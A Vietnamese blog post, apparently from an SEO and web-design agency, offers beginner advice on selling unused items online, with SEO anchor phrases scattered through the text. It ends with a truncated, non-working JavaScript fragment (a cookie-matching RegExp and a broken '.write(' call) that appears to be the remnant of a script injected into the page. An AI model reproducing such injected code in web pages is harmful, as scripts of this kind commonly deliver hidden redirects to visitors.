Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > Online Advertising > Làm thế nào để bán hàng trực tuyến thành công nhanh nhất

Làm thế nào để bán hàng trực tuyến thành công nhanh nhất

Quan sát xung quanh. Thỉnh thoảng có một số thứ mà bạn không thường xuyên sử dụng hay không bao giờ sử dụng. Chúng chỉ ở đâu đó, xung quanh bạn. Với thời kỳ kinh tế này, mọi thứ đều có thể biến thành tiền. Vì thế tại sao chúng ta không biến những thứ đó thành tiền một cách nhanh chóng. Bán hàng online không phải quá khó và ai cũng có thể làm được. Lúc tôi 15 tuổi, tôi đã bán được 10 thứ với 20$ trong 1h.Tôi dùng số tiền đó để mua những thứ tôi thích. Điều đó không khó như bạn vẫn thường nghĩ. Chịu khó theo dõi và tôi sẽ giải thích làm thế nào tôi bán được những thứ đó và tôi đã thành công như thế nào.

dịch vụ seo

I. Tìm ra thứ gì đó để bán.

Nếu quan sát xung quanh bạn có thể tìm thấy một số thứ mà bạn không dùng nữa. Bước đầu tiên là bán những thứ được coi là có giá trị và mọi người đều có thể mua nó. Có vài thứ rất tốt mà bạn chưa bao giờ dùng nhưng lại được mọi người ưa chuộng.

Những thứ thích hợp để bán:

– Xe đạp cũ

– Video Game

– Phụ kiện máy tính

– Thẻ thương mại

– Chăn mền

– Bất cứ thứ gì bạn thấy có thể.

Công ty SEO.

II. Tôi nên bán với giá bao nhiêu?

Đây là chìa khóa để tìm ra người mua. Bạn phải đưa ra mức giá tốt cho các sản phẩm của mình. Nếu giá quá cao thì mọi người sẽ không mua. Nhiều người nghĩ rằng những thứ họ muốn bán có nhiều giá trị hơn. Đó là lý do tại sao chúng ta phải nghiên cứu trước khi bán. Tôi phải bán giá 200$ cho chiếc ghi ta mà tôi muốn bán. Tôi cứ nghĩ nó phải đáng giá 350$. Khi tôi đăng tin này tôi đã không nhận được một email nào. Sau đó tôi đã xem lại chiếc ghi ta của tôi, nhận thấy nó chỉ đáng giá 200$. Một lần bán online với giá tốt, tôi bắt đầu có người mua.

Khi định giá một sản phẩm, bạn cần xem vật đó còn tốt ở mức đố nào, với tình trạng đó thì mọi người thường sẽ bán với giá bao nhiêu tiền? Mức giá quyết định mọi thứ. Nếu bạn bán quá đắt, mọi người thậm chí không thèm ngó qua. Nếu có một cái giá vừa phải thì mọi người sẽ xem qua và tìm kiếm cái giá tốt hơn. Tôi luôn luôn để giá thấp nhất có thể. Với cách đó, những sản phẩm của tôi đều bán rất chạy.

III. Website

Bạn phải có 1 website để bán  hàng. Đây giống như một cái kho lớn. Bạn đăng nhập, đăng sản phẩm lên và người mua sẽ email/ gọi điện hay để lại tin nhắn cho bạn.

Thiết kế Website.

Cảnh báo – Lời khuyên

  • Cảnh báo

Chỉ chấp nhận tiền mặt. Đó là cách dễ dàng nhất để kiểm tra tính chắc chắn. Thẻ tín dụng thường không an toàn trong trường hợp này. Tôi chỉ chấp nhận tiền mặt bởi vì nó an toàn nhất, dễ dàng nhất cho bạn doanh thu và không phải lo lắng về các vấn đề khác.

Gặp gỡ khách để giao hàng ở nơi công cộng. Đây cũng là cách an toàn nhất vì những người xung quanh sẽ thấy nếu bạn bị tấn công hay có những rủi ro khác. Tôi chỉ nói à có thể, đề phòng vẫn tốt hơn.

  • Lời khuyên

Để mức giá thấp nhất có thể. Đây là cách thu hút người mua nhiều nhất và nhanh nhất.

Gắn ảnh. Việc gắn ảnh sẽ có tác dụng rất lớn vì người mua thường chỉ nhìn qua ảnh. Và hãy làm cho những bức ảnh trở nên đẹp hơn.

IV. Kết luận

Bán hàng trực tuyến rất đơn giản, ai cũng có thể làm được để kiếm thêm tiền. Những đứa trẻ có thể bán online để giúp bố mẹ chung. Người lớn thì kiếm tiền để thanh toán các hóa đơn. Mọi người đều có thể bán hàng một cách dễ dàng.

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘